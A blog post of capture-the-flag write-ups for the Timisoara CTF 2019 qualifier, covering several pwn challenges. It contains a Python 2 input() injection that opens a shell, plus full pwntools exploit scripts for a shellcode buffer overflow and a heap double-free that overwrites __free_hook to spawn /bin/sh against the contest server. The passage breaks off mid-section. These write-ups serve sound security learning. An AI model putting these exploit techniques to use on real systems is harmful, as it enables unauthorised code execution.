I"$H<p>An online international CTF competition for high-school students. I played with my regular teammates in <strong>ItzyBitzySpider</strong> under the name <strong>acsii</strong>. We managed to get 12th place, which originally meant we qualified for the onsite competition hosted in Romania, but the competition was cancelled in the end… :(</p>

<p><img src="http://localhost:4000/assets/images/Timisoara CTF 2019 Qualification Round - Scoreboard.png" alt="alt" /></p>

<h1 id="writeups">Writeups</h1>

<h2 id="hiss-hiss-python-pwn">Hiss Hiss Python (pwn)</h2>

<blockquote>
  <p>This snake likes to h1ss at its input.<br />
<code class="language-plaintext highlighter-rouge">nc 89.38.208.144 11113</code></p>
</blockquote>

<p><a href="https://github.com/MiloTruck/CTF-Archive/tree/master/Timisoara%20CTF%202019%20Qualification%20Round/Binary%20Exploitation/Hiss%20Hiss%20Python%20%5B50%5D" class="btn btn--primary">Challenge Files</a></p>

<p><strong>Solution</strong></p>

<p>Unlike Python 3, Python 2’s input() actually evaluates the input instead of taking it as a string. If we feed a command into input(), Python 2 will run the command, which is the vulnerability.
Giving <code class="language-plaintext highlighter-rouge">__import__('os').system('/bin/sh')</code> as input opens a shell.</p>

<p><strong>Flag:</strong> <code class="language-plaintext highlighter-rouge">TIMCTF{h1ss_h1ss_shell}</code></p>

<h2 id="swag-pwn">Swag (pwn)</h2>

<blockquote>
  <p>The server only lets hackers in, not script kiddies.<br />
<code class="language-plaintext highlighter-rouge">nc 89.38.208.144 11111</code></p>
</blockquote>

<p><a href="https://github.com/MiloTruck/CTF-Archive/tree/master/Timisoara%20CTF%202019%20Qualification%20Round/Binary%20Exploitation/Swag%20%5B100%5D" class="btn btn--primary">Challenge Files</a></p>

<p><strong>Solution</strong></p>

<p>This is probably an unintended solution. Run <code class="language-plaintext highlighter-rouge">strings</code> on the binary and we get the following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/lib64/ld-linux-x86-64.so.2
libc.so.6
gets
fflush
exit
srand
puts
time
printf
stdout
__libc_start_main
GLIBC_2.2.5
__gmon_start__
AWAVI
AUATL
[]A\A]A^A_
Enter your name: 
Hello, %s
, it appears you don't have enough swag
, I really like your swag. Come in!
Your access code is: TIMCTF{1_am_th3_c00kie_m0nsta}
</code></pre></div></div>

<p><strong>Flag:</strong> <code class="language-plaintext highlighter-rouge">TIMCTF{1_am_th3_c00kie_m0nsta}</code></p>

<h2 id="bof-server-pwn">Bof-server (pwn)</h2>

<blockquote>
  <p>Today kids we learn how to write exploits for super-secure software: bof-server!<br />
<code class="language-plaintext highlighter-rouge">nc 89.38.208.144 11112</code><br />
(non-standard flag format)</p>
</blockquote>

<p><a href="https://github.com/MiloTruck/CTF-Archive/tree/master/Timisoara%20CTF%202019%20Qualification%20Round/Binary%20Exploitation/Bof-server%20%5B100%5D" class="btn btn--primary">Challenge Files</a></p>

<p><strong>Solution</strong></p>

<p>This is a standard buffer overflow shellcoding challenge.</p>

<p>As usual, running <code class="language-plaintext highlighter-rouge">checksec</code> on the binary gives:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>   Arch:     amd64-64-little  
   RELRO:    Partial RELRO  
   Stack:    No canary found  
   NX:       NX disabled  
   PIE:      No PIE (0x400000)    
   RWX:      Has RWX segments
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">checksec</code> shows the <code class="language-plaintext highlighter-rouge">NX Bit</code> as disabled, which means shellcode can be executed. After running the binary, we see the following output:</p>

<p><code class="language-plaintext highlighter-rouge">Hello! Here is the stack address: 7fffffffdc60, enter your name please:</code></p>

<p>The binary prints out the starting address of the stack, and asks for input. We can use <code class="language-plaintext highlighter-rouge">pwntools</code> to generate the shellcode to execute shell. The payload contains the following:</p>

<ol>
  <li>Shellcode</li>
  <li>Padding (Overflow the stack until RIP)</li>
  <li>Stack address (To jump to our shellcode and execute shell)</li>
</ol>

<p>Here’s the final exploit:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span>
<span class="kn">from</span> <span class="nn">LibcSearcher</span> <span class="kn">import</span> <span class="n">LibcSearcher</span>
<span class="kn">import</span> <span class="nn">sys</span>

<span class="n">config</span> <span class="o">=</span> <span class="p">{</span>
    <span class="s">"elf"</span> <span class="p">:</span> <span class="s">"./bof-server"</span><span class="p">,</span>
    <span class="c1">#"libc" : "./",
</span>    <span class="c1">#"ld" : "./",
</span>    <span class="s">"HOST"</span> <span class="p">:</span> <span class="s">"89.38.208.144"</span><span class="p">,</span>
    <span class="s">"PORT"</span> <span class="p">:</span> <span class="mi">11112</span><span class="p">,</span>
<span class="p">}</span>

<span class="k">def</span> <span class="nf">exploit</span><span class="p">(</span><span class="n">p</span><span class="p">):</span>
    <span class="n">padding</span> <span class="o">=</span> <span class="s">"</span><span class="se">\x90</span><span class="s">"</span><span class="o">*</span><span class="mi">264</span>
    <span class="n">shellcode</span> <span class="o">=</span> <span class="n">asm</span><span class="p">(</span><span class="n">shellcraft</span><span class="p">.</span><span class="n">sh</span><span class="p">())</span>

    <span class="n">ru</span><span class="p">(</span><span class="s">"stack address: "</span> <span class="p">)</span>
    <span class="n">address</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="s">"0x"</span> <span class="o">+</span> <span class="n">r</span><span class="p">(</span><span class="mi">12</span><span class="p">),</span> <span class="mi">16</span><span class="p">)</span>

    <span class="n">payload</span> <span class="o">=</span> <span class="s">"</span><span class="se">\x90</span><span class="s">"</span><span class="o">*</span><span class="mi">50</span> 
    <span class="n">payload</span> <span class="o">+=</span> <span class="n">shellcode</span>
    <span class="n">payload</span> <span class="o">+=</span> <span class="s">"</span><span class="se">\x90</span><span class="s">"</span><span class="o">*</span><span class="p">(</span><span class="mi">264</span><span class="o">-</span><span class="mi">50</span><span class="o">-</span><span class="nb">len</span><span class="p">(</span><span class="n">shellcode</span><span class="p">))</span>
    <span class="n">payload</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">address</span><span class="p">)</span>
    <span class="n">sla</span><span class="p">(</span><span class="s">"please: "</span><span class="p">,</span> <span class="n">payload</span><span class="p">)</span>
    <span class="n">p</span><span class="p">.</span><span class="n">interactive</span><span class="p">()</span>

<span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="s">"__main__"</span><span class="p">:</span>
    <span class="n">elf</span> <span class="o">=</span> <span class="n">context</span><span class="p">.</span><span class="n">binary</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="n">config</span><span class="p">[</span><span class="s">"elf"</span><span class="p">])</span>

    <span class="k">if</span> <span class="s">"libc"</span> <span class="ow">in</span> <span class="n">config</span><span class="p">.</span><span class="n">keys</span><span class="p">()</span> <span class="ow">and</span> <span class="n">config</span><span class="p">[</span><span class="s">"libc"</span><span class="p">]:</span>
        <span class="n">libc</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="n">config</span><span class="p">[</span><span class="s">"libc"</span><span class="p">])</span>

    <span class="k">if</span> <span class="n">sys</span><span class="p">.</span><span class="n">argv</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span> <span class="o">==</span> <span class="s">"remote"</span><span class="p">:</span>
        <span class="n">p</span> <span class="o">=</span> <span class="n">remote</span><span class="p">(</span><span class="n">config</span><span class="p">[</span><span class="s">"HOST"</span><span class="p">],</span> <span class="n">config</span><span class="p">[</span><span class="s">"PORT"</span><span class="p">])</span>
    <span class="k">else</span><span class="p">:</span>
        <span class="k">if</span> <span class="s">"libc"</span> <span class="ow">in</span> <span class="nb">dir</span><span class="p">():</span> 
            <span class="n">p</span> <span class="o">=</span> <span class="n">process</span><span class="p">([</span><span class="n">config</span><span class="p">[</span><span class="s">"ld"</span><span class="p">],</span> <span class="n">config</span><span class="p">[</span><span class="s">"elf"</span><span class="p">]],</span> <span class="n">env</span><span class="o">=</span><span class="p">{</span><span class="s">"LD_PRELOAD"</span> <span class="p">:</span> <span class="n">config</span><span class="p">[</span><span class="s">"libc"</span><span class="p">]})</span>
        <span class="k">else</span><span class="p">:</span> 
            <span class="n">p</span> <span class="o">=</span> <span class="n">process</span><span class="p">(</span><span class="n">config</span><span class="p">[</span><span class="s">"elf"</span><span class="p">])</span>

        <span class="n">pause</span><span class="p">()</span>

    <span class="n">sl</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">a</span><span class="p">:</span> <span class="n">p</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">a</span><span class="p">)</span>
    <span class="n">sla</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">a</span><span class="p">,</span><span class="n">b</span><span class="p">:</span> <span class="n">p</span><span class="p">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="n">a</span><span class="p">,</span><span class="n">b</span><span class="p">)</span>
    <span class="n">r</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">a</span><span class="p">:</span> <span class="n">p</span><span class="p">.</span><span class="n">recv</span><span class="p">(</span><span class="n">a</span><span class="p">)</span>
    <span class="n">ru</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">a</span><span class="p">:</span> <span class="n">p</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="n">a</span><span class="p">)</span>
    <span class="n">lg</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">a</span> <span class="p">:</span> <span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="n">a</span><span class="p">)</span>

    <span class="n">exploit</span><span class="p">(</span><span class="n">p</span><span class="p">)</span>
</code></pre></div></div>

<p><strong>Flag:</strong> <code class="language-plaintext highlighter-rouge">TIMCTF{oooverfl0w}wwwWWW</code></p>

<h2 id="team-manager-pwn">Team Manager (pwn)</h2>

<blockquote>
  <p>I found the team manager service used for Timisoara CTF. Do you think it is secure?<br />
<code class="language-plaintext highlighter-rouge">nc 89.38.208.144 11114</code></p>
</blockquote>

<p><a href="https://github.com/MiloTruck/CTF-Archive/tree/master/Timisoara%20CTF%202019%20Qualification%20Round/Binary%20Exploitation/Team%20Manager%20%5B300%5D" class="btn btn--primary">Challenge Files</a></p>

<p><strong>Solution</strong></p>

<p>Running the binary instantly shows this is a standard heap challenge:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Welcome to the Timctf Team Manager
1: Add player
2: Remove player
3: Edit player
4: View player
5: View team
0: Exit
</code></pre></div></div>

<p>After analyzing the binary using Ghidra, a few observations can be made:</p>
<ul>
  <li>Chunks on the heap can be freed multiple times without checks. There is a double free() vulnerability, which leaks an address pointing to the heap.</li>
  <li>Input is vulnerable to a heap overflow. By overflowing the “comments” section for one chunk, we can overwrite addresses on the following chunk.</li>
</ul>

<p>The exploit follows the following order:</p>

<ol>
  <li>
    <p><strong>Leak heap address</strong><br />
Leak the heap address using the double free() vulnerability. The address is stored in the “reversing and exploitation” and “crypto” areas in the heap. Viewing the team outputs the leaked heap address.</p>
  </li>
  <li>
    <p><strong>Leak printf address</strong><br />
Using the heap overflow, overwrite the pointer to the “comments” section in the second chunk with the address of <code class="language-plaintext highlighter-rouge">printf</code> in the <code class="language-plaintext highlighter-rouge">GLOBAL OFFSET TABLE (GOT)</code>.Viewing the second player outputs the leaked <code class="language-plaintext highlighter-rouge">printf</code> address.</p>
  </li>
  <li>
    <p><strong>Calculate libc base</strong><br />
Standard ret2libc procedure. Libc base can be calculated using <code class="language-plaintext highlighter-rouge">printf - printf_offset</code>, where <code class="language-plaintext highlighter-rouge">printf</code> is the leaked address and <code class="language-plaintext highlighter-rouge">printf_offset</code> is the address of <code class="language-plaintext highlighter-rouge">printf</code> in libc. With libc base value, the address of <code class="language-plaintext highlighter-rouge">__free_hook</code> and <code class="language-plaintext highlighter-rouge">system</code> can be calculated using <code class="language-plaintext highlighter-rouge">libc_base + system_offset</code> and <code class="language-plaintext highlighter-rouge">libc_base + __free_hook_offset</code> respectively.</p>
  </li>
  <li>
    <p><strong>Overwrite __FREE_HOOK pointer with system</strong><br />
Overwrite the pointer to the “comments” section in the second chunk with the address of <code class="language-plaintext highlighter-rouge">__free_hook</code>. This makes the pointer point to the <code class="language-plaintext highlighter-rouge">__free_hook</code> instead. <code class="language-plaintext highlighter-rouge">__free_hook</code> can then be overwritten with the address of <code class="language-plaintext highlighter-rouge">system</code> by editing the “comments” of the second chunk. Calling free() now calls system() instead.</p>
  </li>
  <li>
    <p><strong>Write /bin/sh into heap address</strong>
Write the string <code class="language-plaintext highlighter-rouge">/bin/sh\x00</code> (<em>0x0068732f6e69622f</em> in hex) into the leaked heap address. The argument for free() is stored in this address when free() is called. When calling free() on first chunk, system(/bin/sh) is called instead, which executes a shell.</p>
  </li>
</ol>

<p>Here’s the final exploit:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span>
<span class="kn">from</span> <span class="nn">LibcSearcher</span> <span class="kn">import</span> <span class="n">LibcSearcher</span>
<span class="kn">import</span> <span class="nn">sys</span>

<span class="n">config</span> <span class="o">=</span> <span class="p">{</span>
    <span class="s">"elf"</span> <span class="p">:</span> <span class="s">"./timctf_manager"</span><span class="p">,</span>
    <span class="s">"libc"</span> <span class="p">:</span> <span class="s">"./libc-2.27.so"</span><span class="p">,</span>
    <span class="s">"ld"</span> <span class="p">:</span> <span class="s">"./ld-2.27.so"</span><span class="p">,</span>
    <span class="s">"HOST"</span> <span class="p">:</span> <span class="s">"89.38.208.144"</span><span class="p">,</span>
    <span class="s">"PORT"</span> <span class="p">:</span> <span class="mi">11114</span><span class="p">,</span>
<span class="p">}</span>

<span class="k">def</span> <span class="nf">add</span><span class="p">(</span><span class="n">pid</span><span class="p">,</span> <span class="n">name</span><span class="p">,</span> <span class="n">reversing</span><span class="p">,</span> <span class="n">web</span><span class="p">,</span> <span class="n">crypto</span><span class="p">,</span> <span class="n">forensics</span><span class="p">,</span> <span class="n">comment</span><span class="p">):</span>
	<span class="n">sla</span><span class="p">(</span><span class="s">"0: Exit"</span><span class="p">,</span> <span class="s">"1"</span><span class="p">)</span>
	<span class="n">sla</span><span class="p">(</span><span class="s">"Enter player id (1-4) "</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">pid</span><span class="p">))</span>
	<span class="n">sla</span><span class="p">(</span><span class="s">"Player's name: "</span><span class="p">,</span> <span class="n">name</span><span class="p">)</span>
	<span class="n">sla</span><span class="p">(</span><span class="s">"Player's skill at reversing and exploitation: "</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">reversing</span><span class="p">))</span> 
	<span class="n">sla</span><span class="p">(</span><span class="s">"Player's skill at web exploit: "</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">web</span><span class="p">))</span>
	<span class="n">sla</span><span class="p">(</span><span class="s">"Player's skill at crypto: "</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">crypto</span><span class="p">))</span>
	<span class="n">sla</span><span class="p">(</span><span class="s">"Player's skill at forensics: "</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">forensics</span><span class="p">))</span>
	<span class="n">sla</span><span class="p">(</span><span class="s">"Extra note/comment: "</span><span class="p">,</span> <span class="n">comment</span><span class="p">)</span>

<span class="k">def</span> <span class="nf">remove</span><span class="p">(</span><span class="n">pid</span><span class="p">):</span>
	<span class="n">sla</span><span class="p">(</span><span class="s">"0: Exit"</span><span class="p">,</span> <span class="s">"2"</span><span class="p">)</span>
	<span class="n">sla</span><span class="p">(</span><span class="s">"Enter player id (1-4) "</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">pid</span><span class="p">))</span>

<span class="k">def</span> <span class="nf">edit</span><span class="p">(</span><span class="n">pid</span><span class="p">,</span> <span class="n">name</span><span class="p">,</span> <span class="n">reversing</span><span class="p">,</span> <span class="n">web</span><span class="p">,</span> <span class="n">crypto</span><span class="p">,</span> <span class="n">forensics</span><span class="p">,</span> <span class="n">comment</span><span class="p">):</span>
	<span class="n">sla</span><span class="p">(</span><span class="s">"0: Exit"</span><span class="p">,</span> <span class="s">"3"</span><span class="p">)</span>
	<span class="n">sla</span><span class="p">(</span><span class="s">"Enter player id (1-4) "</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">pid</span><span class="p">))</span>
	<span class="n">sla</span><span class="p">(</span><span class="s">"Player's name: "</span><span class="p">,</span> <span class="n">name</span><span class="p">)</span>
	<span class="n">sla</span><span class="p">(</span><span class="s">"Player's skill at reversing and exploitation: "</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">reversing</span><span class="p">))</span> 
	<span class="n">sla</span><span class="p">(</span><span class="s">"Player's skill at web exploit: "</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">web</span><span class="p">))</span>
	<span class="n">sla</span><span class="p">(</span><span class="s">"Player's skill at crypto: "</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">crypto</span><span class="p">))</span>
	<span class="n">sla</span><span class="p">(</span><span class="s">"Player's skill at forensics: "</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">forensics</span><span class="p">))</span>
	<span class="n">sla</span><span class="p">(</span><span class="s">"Extra note/comment: "</span><span class="p">,</span> <span class="n">comment</span><span class="p">)</span>

<span class="k">def</span> <span class="nf">viewplayer</span><span class="p">(</span><span class="n">pid</span><span class="p">):</span>
	<span class="n">sla</span><span class="p">(</span><span class="s">"0: Exit"</span><span class="p">,</span> <span class="s">"4"</span><span class="p">)</span>
	<span class="n">sla</span><span class="p">(</span><span class="s">"Enter player id (1-4) "</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">pid</span><span class="p">))</span>

<span class="k">def</span> <span class="nf">viewteam</span><span class="p">():</span>
	<span class="n">sla</span><span class="p">(</span><span class="s">"0: Exit"</span><span class="p">,</span> <span class="s">"5"</span><span class="p">)</span>

<span class="k">def</span> <span class="nf">tohex</span><span class="p">(</span><span class="n">val</span><span class="p">,</span> <span class="n">nbits</span><span class="p">):</span>
  <span class="k">return</span> <span class="nb">hex</span><span class="p">((</span><span class="n">val</span> <span class="o">+</span> <span class="p">(</span><span class="mi">1</span> <span class="o">&lt;&lt;</span> <span class="n">nbits</span><span class="p">))</span> <span class="o">%</span> <span class="p">(</span><span class="mi">1</span> <span class="o">&lt;&lt;</span> <span class="n">nbits</span><span class="p">))</span>

<span class="k">def</span> <span class="nf">exploit</span><span class="p">(</span><span class="n">p</span><span class="p">):</span>
	<span class="n">print_menu</span> <span class="o">=</span> <span class="mh">0x00400827</span>
	<span class="n">printf_got</span> <span class="o">=</span> <span class="n">elf</span><span class="p">.</span><span class="n">got</span><span class="p">[</span><span class="s">'printf'</span><span class="p">]</span>
	<span class="n">data</span>  <span class="o">=</span> <span class="n">elf</span><span class="p">.</span><span class="n">get_section_by_name</span><span class="p">(</span><span class="s">".data"</span><span class="p">).</span><span class="n">header</span><span class="p">.</span><span class="n">sh_addr</span>

	<span class="n">add</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="s">""</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="s">""</span><span class="p">)</span>
	<span class="n">add</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="s">""</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="s">""</span><span class="p">)</span>
	<span class="n">remove</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
	<span class="n">remove</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
	<span class="n">viewteam</span><span class="p">()</span>

	<span class="n">ru</span><span class="p">(</span><span class="s">'reversing and exploitation: '</span><span class="p">)</span>
	<span class="n">lo</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">p</span><span class="p">.</span><span class="n">recvline</span><span class="p">().</span><span class="n">strip</span><span class="p">())</span>
	<span class="n">lo</span> <span class="o">=</span> <span class="nb">str</span><span class="p">(</span><span class="n">tohex</span><span class="p">(</span><span class="n">lo</span><span class="p">,</span> <span class="mi">32</span><span class="p">))[</span><span class="mi">2</span><span class="p">:]</span>
	<span class="n">ru</span><span class="p">(</span><span class="s">"crypto: "</span><span class="p">)</span>
	<span class="n">hi</span> <span class="o">=</span> <span class="nb">str</span><span class="p">(</span><span class="nb">hex</span><span class="p">(</span><span class="nb">int</span><span class="p">(</span><span class="n">p</span><span class="p">.</span><span class="n">recvline</span><span class="p">().</span><span class="n">strip</span><span class="p">())))</span>
	<span class="n">leak</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">hi</span> <span class="o">+</span> <span class="n">lo</span><span class="p">,</span> <span class="mi">16</span><span class="p">)</span>

	<span class="n">payload</span> <span class="o">=</span> <span class="s">"</span><span class="se">\x90</span><span class="s">"</span><span class="o">*</span><span class="mi">264</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x61</span><span class="p">)</span> <span class="o">+</span> <span class="n">p32</span><span class="p">(</span><span class="mi">2</span><span class="p">)</span><span class="o">*</span><span class="mi">4</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">printf_got</span><span class="p">)</span>

	<span class="n">edit</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="s">""</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="n">payload</span><span class="p">)</span>
	<span class="n">viewplayer</span><span class="p">(</span><span class="mi">2</span><span class="p">)</span>
	<span class="n">ru</span><span class="p">(</span><span class="s">"Extra note/comment: "</span><span class="p">)</span>

	<span class="n">printf</span> <span class="o">=</span> <span class="n">u64</span><span class="p">(</span><span class="n">r</span><span class="p">(</span><span class="mi">8</span><span class="p">))</span>
	<span class="n">base</span> <span class="o">=</span> <span class="n">printf</span> <span class="o">-</span> <span class="n">libc</span><span class="p">.</span><span class="n">symbols</span><span class="p">[</span><span class="s">'printf'</span><span class="p">]</span>
	<span class="n">free_hook</span> <span class="o">=</span> <span class="n">base</span> <span class="o">+</span> <span class="n">libc</span><span class="p">.</span><span class="n">symbols</span><span class="p">[</span><span class="s">'__free_hook'</span><span class="p">]</span>
	<span class="n">system</span> <span class="o">=</span> <span class="n">base</span> <span class="o">+</span> <span class="n">libc</span><span class="p">.</span><span class="n">symbols</span><span class="p">[</span><span class="s">'system'</span><span class="p">]</span>
	
	<span class="n">payload</span> <span class="o">=</span> <span class="s">"</span><span class="se">\x90</span><span class="s">"</span><span class="o">*</span><span class="mi">264</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x61</span><span class="p">)</span> <span class="o">+</span> <span class="n">p32</span><span class="p">(</span><span class="mi">2</span><span class="p">)</span><span class="o">*</span><span class="mi">4</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">free_hook</span><span class="p">)</span>
	<span class="n">edit</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="s">""</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="n">payload</span><span class="p">)</span>
	<span class="n">edit</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="s">""</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="n">p64</span><span class="p">(</span><span class="n">system</span><span class="p">))</span>

	<span class="n">payload</span> <span class="o">=</span> <span class="s">"</span><span class="se">\x90</span><span class="s">"</span><span class="o">*</span><span class="mi">264</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x61</span><span class="p">)</span> <span class="o">+</span> <span class="n">p32</span><span class="p">(</span><span class="mi">2</span><span class="p">)</span><span class="o">*</span><span class="mi">4</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">leak</span><span class="p">)</span>
	<span class="n">edit</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="s">""</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="n">payload</span><span class="p">)</span>
	<span class="n">edit</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="s">""</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x0068732f6e69622f</span><span class="p">))</span>
	<span class="n">remove</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
	
	<span class="n">p</span><span class="p">.</span><span class="n">interactive</span><span class="p">()</span>

<span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="s">"__main__"</span><span class="p">:</span>
    <span class="n">elf</span> <span class="o">=</span> <span class="n">context</span><span class="p">.</span><span class="n">binary</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="n">config</span><span class="p">[</span><span class="s">"elf"</span><span class="p">])</span>

    <span class="k">if</span> <span class="s">"libc"</span> <span class="ow">in</span> <span class="n">config</span><span class="p">.</span><span class="n">keys</span><span class="p">()</span> <span class="ow">and</span> <span class="n">config</span><span class="p">[</span><span class="s">"libc"</span><span class="p">]:</span>
        <span class="n">libc</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="n">config</span><span class="p">[</span><span class="s">"libc"</span><span class="p">])</span>

    <span class="k">if</span> <span class="n">sys</span><span class="p">.</span><span class="n">argv</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span> <span class="o">==</span> <span class="s">"remote"</span><span class="p">:</span>
        <span class="n">p</span> <span class="o">=</span> <span class="n">remote</span><span class="p">(</span><span class="n">config</span><span class="p">[</span><span class="s">"HOST"</span><span class="p">],</span> <span class="n">config</span><span class="p">[</span><span class="s">"PORT"</span><span class="p">])</span>
    <span class="k">else</span><span class="p">:</span>
        <span class="k">if</span> <span class="s">"libc"</span> <span class="ow">in</span> <span class="nb">dir</span><span class="p">():</span> 
            <span class="n">p</span> <span class="o">=</span> <span class="n">process</span><span class="p">([</span><span class="n">config</span><span class="p">[</span><span class="s">"ld"</span><span class="p">],</span> <span class="n">config</span><span class="p">[</span><span class="s">"elf"</span><span class="p">]],</span> <span class="n">env</span><span class="o">=</span><span class="p">{</span><span class="s">"LD_PRELOAD"</span> <span class="p">:</span> <span class="n">config</span><span class="p">[</span><span class="s">"libc"</span><span class="p">]})</span>
        <span class="k">else</span><span class="p">:</span> 
            <span class="n">p</span> <span class="o">=</span> <span class="n">process</span><span class="p">(</span><span class="n">config</span><span class="p">[</span><span class="s">"elf"</span><span class="p">])</span>

        <span class="n">pause</span><span class="p">()</span>

    <span class="n">sl</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">a</span><span class="p">:</span> <span class="n">p</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">a</span><span class="p">)</span>
    <span class="n">sla</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">a</span><span class="p">,</span><span class="n">b</span><span class="p">:</span> <span class="n">p</span><span class="p">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="n">a</span><span class="p">,</span><span class="n">b</span><span class="p">)</span>
    <span class="n">r</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">a</span><span class="p">:</span> <span class="n">p</span><span class="p">.</span><span class="n">recv</span><span class="p">(</span><span class="n">a</span><span class="p">)</span>
    <span class="n">ru</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">a</span><span class="p">:</span> <span class="n">p</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="n">a</span><span class="p">)</span>
    <span class="n">lg</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">a</span> <span class="p">:</span> <span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="n">a</span><span class="p">)</span>

    <span class="n">exploit</span><span class="p">(</span><span class="n">p</span><span class="p">)</span>
</code></pre></div></div>

<p><strong>Flag:</strong> <code class="language-plaintext highlighter-rouge">TIMCTF{Heap_overfl0ws_are_really_B4D}</code></p>

<h2 id="flag-manager-service-pwn">Flag Manager Service (pwn)</h2>

<blockquote>
  <p>Our spies found this flag manager service running on the ctf server. It needs a password tho, but I am sure you can handle it.<br />
<code class="language-plaintext highlighter-rouge">nc 89.38.208.144 11115</code></p>
</blockquote>

<p><a href="https://github.com/MiloTruck/CTF-Archive/tree/master/Timisoara%20CTF%202019%20Qualification%20Round/Binary%20Exploitation/Flag%20Manager%20Service%20%5B400%5D" class="btn btn--primary">Challenge Files</a></p>

<p><strong>Solution</strong></p>

<p>Analysis of the binary with Ghidra shows this is a standard ret2libc buffer overflow. <code class="language-plaintext highlighter-rouge">libc-2.27.so</code> being provided reinforces the challenge being a ret2libc.</p>

<p>As usual, all ret2libc exploits have the following order:</p>
<ol>
  <li>
    <p><strong>Leak the address of puts</strong><br />
